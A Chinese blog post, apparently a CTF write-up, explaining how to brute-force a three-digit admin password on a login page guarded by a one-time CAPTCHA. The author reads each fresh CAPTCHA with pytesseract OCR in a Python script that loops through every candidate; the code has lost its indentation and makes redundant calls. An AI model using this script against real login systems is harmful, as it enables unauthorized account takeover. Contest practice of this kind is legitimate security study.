Catalog
  1. 1. 审题
  2. 2. 验证码识别+密码爆破
Python之验证码识别爆破

一道比赛题目。

审题

三位数的密码。有个验证码。

  1. 考虑是否js代码验证,是就在html界面删除js代码绕过
  2. 如果不是js代码验证,检测验证码的时效性,是否达到一次一用,如果不是可以保持验证码一直爆破

审题结果:三位数密码,验证码时效性为一次一用(已经确定223密码是错误的)

验证码识别+密码爆破

直接放代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
# -*- coding: utf-8 -*-
import requests
import pytesseract
from PIL import Image


def shibie(count):
# https://www.jianshu.com/p/60f7b65026fe 下载图片
src = 'http://39.100.83.188:8002/vcode.php?tdsourcetag=s_pcqq_aiomsg'
r = requests.get(src)
with open('验证码.png', 'wb') as f:
f.write(r.content)
# https://www.cnblogs.com/yeayee/p/4955506.html 识别验证码
image = Image.open('验证码.png')
vcode = pytesseract.image_to_string(image)
# print("验证码:" + vcode)

# tesseract-ocr的环境配置有点麻烦,教程在:https://blog.csdn.net/qq_37193537/article/details/81335165

url = 'http://39.100.83.188:8002/login.php'

payload = {
'username': "admin",
'pwd': count,
'user_code': vcode,
'Login': "submit"
}
# 发送请求包
r = requests.request("POST", url, data=payload)
r.encoding = 'utf-8'
print(r.text)
return len(r.text)


# 三位数生成
count = 100
while (count < 1000):
print(count)
shibie(count)
#判断返还text文本长度,为5则为验证码错误,再重新识别一次验证码,再次将当前密码再测试一次
while shibie(count) == 5:
shibie(count)
count = count + 1

Author: 九指
Link: /2019/05/02/python%E4%B9%8B%E9%AA%8C%E8%AF%81%E7%A0%81%E8%AF%86%E5%88%AB%E7%88%86%E7%A0%B4/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
Donate
  • 微信
  • 支付寶